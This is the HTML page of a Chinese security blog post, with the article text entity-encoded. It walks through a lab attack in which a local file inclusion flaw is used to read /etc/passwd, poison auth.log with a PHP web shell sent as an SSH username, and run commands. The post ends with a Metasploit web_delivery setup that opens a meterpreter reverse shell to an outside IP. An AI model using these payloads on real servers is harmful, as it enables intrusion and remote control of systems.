

<!DOCTYPE html>
<html lang="">
<head prefix="og: http://ogp.me/ns#"><meta name="generator" content="Hexo 3.8.0">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
    <meta name="description" content="">
    <title>在Linux下文件包含漏洞的另类拿SHELL方法 | c1y2m3’blog</title>

    <!-- Open Graph -->
    <meta name="description" content="&amp;#x5728;&amp;#x5B9E;&amp;#x6218;&amp;#x4E2D;&amp;#x8FD8;&amp;#x662F;&amp;#x6BD4;&amp;#x8F83;&amp;#x9E21;&amp;#x808B;&amp;#x7684;&amp;#xFF0C;&amp;#x4E0D;&amp;#x8FC7;&amp;#x7528;&amp;#x6765;&amp;#x7EF4;&amp;#x6301;&amp;#x6743;&amp;#x9650;&amp;#x4E5F;&amp;#x662F;&amp;#x5F88;&amp;#x68D2;&amp;#x7684;">
<meta property="og:type" content="article">
<meta property="og:title" content="在Linux下文件包含漏洞的另类拿SHELL方法">
<meta property="og:url" content="http://yoursite.com/2018/11/20/在Linux下文件包含漏洞的另类拿SHELL方法 /index.html">
<meta property="og:site_name" content="c1y2m3’blog">
<meta property="og:description" content="&amp;#x5728;&amp;#x5B9E;&amp;#x6218;&amp;#x4E2D;&amp;#x8FD8;&amp;#x662F;&amp;#x6BD4;&amp;#x8F83;&amp;#x9E21;&amp;#x808B;&amp;#x7684;&amp;#xFF0C;&amp;#x4E0D;&amp;#x8FC7;&amp;#x7528;&amp;#x6765;&amp;#x7EF4;&amp;#x6301;&amp;#x6743;&amp;#x9650;&amp;#x4E5F;&amp;#x662F;&amp;#x5F88;&amp;#x68D2;&amp;#x7684;">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf447eadb5aa647e44e3070">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf448509b521a5a853731e5">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf44873db5aa647e44e30ae">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf44891db5aa647e44e30bc">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf448fb50f8dd54d461c343">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf928ba9b521a5a857e5341">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf448cf50f8dd54d461c322">
<meta property="og:updated_time" content="2018-11-24T10:33:16.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="在Linux下文件包含漏洞的另类拿SHELL方法">
<meta name="twitter:description" content="&amp;#x5728;&amp;#x5B9E;&amp;#x6218;&amp;#x4E2D;&amp;#x8FD8;&amp;#x662F;&amp;#x6BD4;&amp;#x8F83;&amp;#x9E21;&amp;#x808B;&amp;#x7684;&amp;#xFF0C;&amp;#x4E0D;&amp;#x8FC7;&amp;#x7528;&amp;#x6765;&amp;#x7EF4;&amp;#x6301;&amp;#x6743;&amp;#x9650;&amp;#x4E5F;&amp;#x662F;&amp;#x5F88;&amp;#x68D2;&amp;#x7684;">
<meta name="twitter:image" content="https://www.yunzhijia.com/microblog/filesvr/5bf447eadb5aa647e44e3070">

    <script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Person",
  "email": "mailto:",
  "image": "",
  "name": "John Doe",
  "url": "http://yoursite.com"
}
</script>
    <script>
    var algoliaEnabled = false;
    
</script>

    

    
    
        <link href="https://fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
    
    
    
        <!-- stylesheets list from config.yml -->
        
        <link rel="stylesheet" href="/c1y2m3.github.io/css/aloha.css">
        
        <link rel="stylesheet" href="//cdn.bootcss.com/semantic-ui/2.2.4/semantic.min.css">
        
        <link rel="stylesheet" href="//cdn.bootcss.com/magnific-popup.js/1.1.0/magnific-popup.min.css">
        
    

</head>
<body id="body" style="margin-bottom: 0;" class="pushable">

    <div class="ui top fixed menu">
        <a class="item" id="menu-icon"><i class="sidebar icon"></i></a>
    </div>

    <div id="menu-sidebar" class="ui left vertical sidebar menu">

    <div id="sidebar-top">
        <div class="content">
            <h3>c1y2m3’blog</h3>
        </div>
    </div>
    <div class="ui container sidebar-card">
    <div class="ui people shape content">
        <div class="active side">
            <div class="ui card">
                <div class="image">
                    <img class="ui medium bordered image" src="/c1y2m3.github.io/images/avatar.jpg">
                </div>
                <div class="content">
                    <a class="header">John Doe</a>
                    
                </div>
                <div class="extra content">
                    <div class="ui list">
                        
                        
                    </div>

                </div>
                <div class="extra content">
                    <div class="ui list">
                        
                    </div>
                </div>
            </div>
        </div>
    </div>


</div>

    
    

    

    
    <a href="/index.html" class="item">
        <i class="home icon"></i>
        HOME
    </a>

    

    
</div>

    <div class="pusher body-content">
        <div id="content" class="ui main container">
            <!--<div class="ui one column grid">-->
                <!--<div class="column">-->
                    <!--<div class="ui main container">-->
                        <div id="post-在Linux下文件包含漏洞的另类拿SHELL方法 " class="ui main container article-type-post">

    

    <div class="ui divided grid">

        <div class="two column row" id="article-content">

            <div class="thirteen wide computer thirteen wide tablet sixteen wide mobile column">
                

<h1 class="ui header">
    
    在Linux下文件包含漏洞的另类拿SHELL方法
</h1>



                <div class="article-inner">

                    <div class="article-entry" itemprop="articleBody">
                        
                        <p>&#x5728;&#x5B9E;&#x6218;&#x4E2D;&#x8FD8;&#x662F;&#x6BD4;&#x8F83;&#x9E21;&#x808B;&#x7684;&#xFF0C;&#x4E0D;&#x8FC7;&#x7528;&#x6765;&#x7EF4;&#x6301;&#x6743;&#x9650;&#x4E5F;&#x662F;&#x5F88;&#x68D2;&#x7684;&#x3002;</p>
<pre><code>&#x653B;&#x51FB;&#x8005;&#xFF1A;Kali Linux
&#x76EE;&#x6807;&#xFF1A;Ubuntu
</code></pre><p>&#x521B;&#x5EFA;&#x4E00;&#x4E2A;PHP&#x6587;&#x4EF6;&#xFF0C;&#x5141;&#x8BB8;&#x7528;&#x6237;&#x901A;&#x8FC7;&#x6587;&#x4EF6;&#x53C2;&#x6570;&#x5305;&#x542B;&#x6587;&#x4EF6;&#x3002;&#x56E0;&#x6B64;&#xFF0C;&#x4F7F;&#x7528;&#x6587;&#x4EF6;&#x53C2;&#x6570;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x4E00;&#x4E2A;&#x5305;&#x542B;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x7684;&#x6587;&#x4EF6;,&#x4F7F;&#x672A;&#x7ECF;&#x6388;&#x6743;&#x7684;&#x8BBF;&#x95EE;&#x662F;&#x76EE;&#x6807;PC&#x3002;</p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf447eadb5aa647e44e3070"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf447eadb5aa647e44e3070" alt="" class="ui centered image"></a></p>
<p>&#x7531;&#x4E8E;&#x6211;&#x4EEC;&#x5DF2;&#x7ECF;&#x5728;/ var / www / html&#x4E2D;&#x6DFB;&#x52A0;&#x4E86;&#x4E00;&#x4E2A;&#x5305;&#x542B;include&#x51FD;&#x6570;&#x7684;php&#x6587;&#x4EF6;&#xFF0C;&#x5141;&#x8BB8;&#x901A;&#x8FC7;&#x5B83;&#x8BFB;&#x53D6;&#x53E6;&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x5E76;&#x4E14;&#x53EF;&#x80FD;&#x5BFC;&#x81F4;LFI&#x653B;&#x51FB;&#x3002;&#x8BA9;&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x6784;&#x9020;URL&#x6765;&#x8BFB;&#x53D6;&#x5BC6;&#x7801;&#x6587;&#x4EF6;</p>
<h2 id="&#x672C;&#x5730;&#x4E3B;&#x673A;-lfi-php-&#x6587;&#x4EF6;-etc-passwd&#x6587;&#x4EF6;"><a href="#&#x672C;&#x5730;&#x4E3B;&#x673A;-lfi-php-&#x6587;&#x4EF6;-etc-passwd&#x6587;&#x4EF6;" class="headerlink" title="&#x672C;&#x5730;&#x4E3B;&#x673A;/lfi.php?&#x6587;&#x4EF6;=/etc/passwd&#x6587;&#x4EF6;"></a>&#x672C;&#x5730;&#x4E3B;&#x673A;/lfi.php?&#x6587;&#x4EF6;=/etc/passwd&#x6587;&#x4EF6;</h2><p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf448509b521a5a853731e5"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf448509b521a5a853731e5" alt="" class="ui centered image"></a></p>
<p>&#x5728;kali Linux&#x4E2D;&#x6253;&#x5F00;&#x7EC8;&#x7AEF;&#x5E76; &#x901A;&#x8FC7;SSH&#x670D;&#x52A1;&#x8FDE;&#x63A5;&#x76EE;&#x6807;<br>    &#x5728;&#x9776;&#x673A;&#x4E0A;&#x952E;&#x5165;&#x4EE5;&#x4E0B;&#x547D;&#x4EE4;&#x67E5;&#x770B;&#x5176;&#x65E5;&#x5FD7;&#xFF1A;<br>    tail -f /var/log/auth.log<br>    &#x4ECE;&#x4E0B;&#x9762;&#x7684;&#x56FE;&#x7247;&#x4F60;&#x53EF;&#x4EE5;&#x68C0;&#x67E5;auth.log&#x6587;&#x4EF6;&#x7684;&#x751F;&#x6210;&#x65E5;&#x5FD7;&#x7684;&#x8BE6;&#x7EC6;&#x4FE1;&#x606F;&#x3002;</p>
<p>   <a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf44873db5aa647e44e30ae"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf44873db5aa647e44e30ae" alt="" class="ui centered image"></a><br>    &#x73B0;&#x5728;&#x6211;&#x5C06;&#x5C1D;&#x8BD5;&#x5728;&#x6D4F;&#x89C8;&#x5668;&#x4E0A;&#x901A;&#x8FC7;lfi.php&#x6253;&#x5F00;auth.log&#x65E5;&#x5FD7;&#x6587;&#x4EF6;&#xFF0C;&#x56E0;&#x6B64;&#x6388;&#x4E88;&#x5BF9;auth.log&#x7684;&#x8BFB;&#x5199;&#x6743;&#x9650;&#xFF0C;&#x8FD9;&#x4E5F;&#x5C31;&#x662F;&#x6240;&#x8BF4;&#x7684;&#x9E21;&#x808B;&#x5904;&#x3002;</p>
<p><code>chmod 775 auth.log</code></p>
<p>&#x7531;&#x4E8E;auth.log&#x6587;&#x4EF6;&#x4F1A;&#x5728;&#x6211;&#x4EEC;&#x5C1D;&#x8BD5;&#x8FDE;&#x63A5;&#x5230;Web&#x670D;&#x52A1;&#x5668;&#x65F6;&#x4E3A;&#x6BCF;&#x6B21;&#x6210;&#x529F;&#x90FD;&#x751F;&#x6210;&#x65E5;&#x5FD7;&#xFF0C;&#x5E76;&#x5931;&#x8D25;&#x767B;&#x5F55;&#x5C1D;&#x8BD5;&#x3002;&#x73B0;&#x5728;&#x5229;&#x7528;&#x8FD9;&#x4E2A;&#x529F;&#x80FD;&#xFF0C;&#x6211;&#x4F1A;&#x53D1;&#x9001;&#x6076;&#x610F;PHP&#x4EE3;&#x7801; &#x4F5C;&#x4E3A;&#x5047;&#x7528;&#x6237;&#xFF0C;&#x5B83;&#x4F1A;&#x81EA;&#x52A8;&#x6DFB;&#x52A0;&#x5230;auth.log&#x6587;&#x4EF6;&#x4F5C;&#x4E3A;&#x65B0;&#x7684;&#x65E5;&#x5FD7;&#x3002;</p>
<p>&#x53D1;&#x9001;&#x6076;&#x610F;PHP&#x4EE3;&#x7801; &#x4F5C;&#x4E3A;&#x5047;&#x7528;&#x6237;&#xFF0C;&#x5B83;&#x4F1A;&#x81EA;&#x52A8;&#x6DFB;&#x52A0;&#x5230;auth.log&#x6587;&#x4EF6;&#x4F5C;&#x4E3A;&#x65B0;&#x7684;&#x65E5;&#x5FD7;&#x3002;</p>
<p><code>ssh  &apos; &lt;&#xFF1F;php system&#xFF08;$ _ GET [&apos;c&apos;]&#xFF09;; &#xFF1F;&gt;&apos;@ 172.16.20.131</code></p>
<p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf44891db5aa647e44e30bc"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf44891db5aa647e44e30bc" alt="" class="ui centered image"></a></p>
<h2 id="&#x672C;&#x5730;&#x4E3B;&#x673A;-lfi-php-&#x6587;&#x4EF6;-var-log-auth-log-amp-c-ifconfig"><a href="#&#x672C;&#x5730;&#x4E3B;&#x673A;-lfi-php-&#x6587;&#x4EF6;-var-log-auth-log-amp-c-ifconfig" class="headerlink" title=" &#x672C;&#x5730;&#x4E3B;&#x673A;/lfi.php?&#x6587;&#x4EF6;=/var/log/auth.log&amp;c=ifconfig"></a> &#x672C;&#x5730;&#x4E3B;&#x673A;/lfi.php?&#x6587;&#x4EF6;=/var/log/auth.log&amp;c=ifconfig</h2><p><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf448fb50f8dd54d461c343"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf448fb50f8dd54d461c343" alt="" class="ui centered image"></a><br>&#x5982;&#x679C;&#x60A8;&#x5728;&#x4EFB;&#x4F55;Web&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x4E2D;&#x53D1;&#x73B0;&#x6B64;&#x7C7B;&#x6F0F;&#x6D1E;&#xFF0C;&#x5219;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;metasploit&#x5E73;&#x53F0;&#x6765;&#x5229;&#x7528;Web&#x670D;&#x52A1;&#x5668;&#x3002;</p>
<figure class="highlight plain"><figcaption><span>exploit/multi/script/web_delivery</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">msf exploit (web_delivery)&gt;set target 1</span><br><span class="line">msf exploit (web_delivery)&gt; set payload php/meterpreter/reverse_tcp</span><br><span class="line">msf exploit (web_delivery)&gt; set lhost 119.29.205.214</span><br><span class="line">msf exploit (web_delivery)&gt;set srvport  8089</span><br><span class="line">msf exploit (web_delivery)&gt;exploit</span><br></pre></td></tr></table></figure>
<p>&#x5C06;&#x4E0A;&#x9762; &#x590D;&#x5236;&#x7684;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x7C98;&#x8D34;&#x5230; URL&#x4E2D;&#xFF0C;&#x5982;&#x56FE;&#x6240;&#x793A;&#xFF0C;&#x5E76;&#x5C06; &#x5176; &#x4F5C;&#x4E3A;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x3002;<br><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf928ba9b521a5a857e5341"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf928ba9b521a5a857e5341" alt="" class="ui centered image"></a><br>&#x5F53;&#x4E0A;&#x9762;&#x7684;&#x4EE3;&#x7801;&#x5F97;&#x5230;&#x6267;&#x884C;&#x65F6;&#xFF0C;&#x60A8;&#x5C06;&#x83B7;&#x5F97;&#x76EE;&#x6807;Web&#x670D;&#x52A1;&#x5668;&#x7684;meterpreter&#x4F1A;&#x8BDD;1&#x3002;<br><a class="magnific-img" href="https://www.yunzhijia.com/microblog/filesvr/5bf448cf50f8dd54d461c322"><img src="https://www.yunzhijia.com/microblog/filesvr/5bf448cf50f8dd54d461c322" alt="" class="ui centered image"></a></p>

                        
                    </div>

                    
                    
                    

                    <div class="description post-description">
    <span class="post-description-item">
        <time datetime="2018-11-19T16:34:14.000Z" itemprop="datePublished">2018-11-20</time>

    </span>
    <span class="post-description-item">
        
    </span>
</div>

                </div>
                
                <div id="pagination" class="nav-web ui text container pagination">

    <div class="ui stackable two column divided grid container">
        <div class="row">
            <div class="column nav-left">
                

                <a href="/c1y2m3.github.io/2019/01/17/---/" class="ui tiny button">

                    <i class="angle left icon"></i>
                    
                    利用tscon未授权登录远程桌面
                    

                </a>

                
            </div>
            <div class="column nav-right">
                

                <a href="/c1y2m3.github.io/2018/11/14/如何有效防御CSRF/" class="ui tiny button">
                    
                    如何有效防御CSRF
                    
                    <i class="angle right icon"></i></a>
                
            </div>
        </div>
    </div>

</div>
                
            </div>

            
            <div class="three wide computer three wide tablet column">

                <div class="ui sticky article-toc" id="article-toc">
                    <!-- toc -->
                    <ol class="ui ordered list"><li><a href="#本地主机-lfi-php-文件-etc-passwd文件"><span>本地主机/lfi.php?文件=/etc/passwd文件</span></a></li><li><a href="#本地主机-lfi-php-文件-var-log-auth-log-amp-c-ifconfig"><span> 本地主机/lfi.php?文件=/var/log/auth.log&c=ifconfig</span></a></li></ol>
                </div>

            </div>
            

        </div>
    </div>
</div>


                    <!--</div>-->
                <!--</div>-->
            <!--</div>-->
        </div>
        <div class="ui vertical footer segment">
    <div class="ui center aligned container">
        <div class="ui inverted section divider"></div>
        &copy; 2019 <a href="/">John Doe</a>,
        Powered by <a href="https://github.com/henryhuang/hexo-theme-aloha" target="_blank">Aloha</a> and <a href="http://hexo.io/" target="_blank">Hexo</a>.
    </div>
</div>

    </div>




<!-- scripts list from theme config.yml -->

<script src="//cdn.bootcss.com/jquery/3.1.0/jquery.min.js"></script>

<script src="//cdn.bootcss.com/semantic-ui/2.2.4/semantic.min.js"></script>

<script src="//cdn.bootcss.com/algoliasearch/3.18.1/algoliasearch.min.js"></script>

<script src="//cdn.bootcss.com/algoliasearch-helper-js/2.13.0/algoliasearch.helper.min.js"></script>

<script src="/c1y2m3.github.io/js/semantic-ui-algolia.js"></script>

<script src="/c1y2m3.github.io/js/aloha-events.js"></script>



</body>
</html>
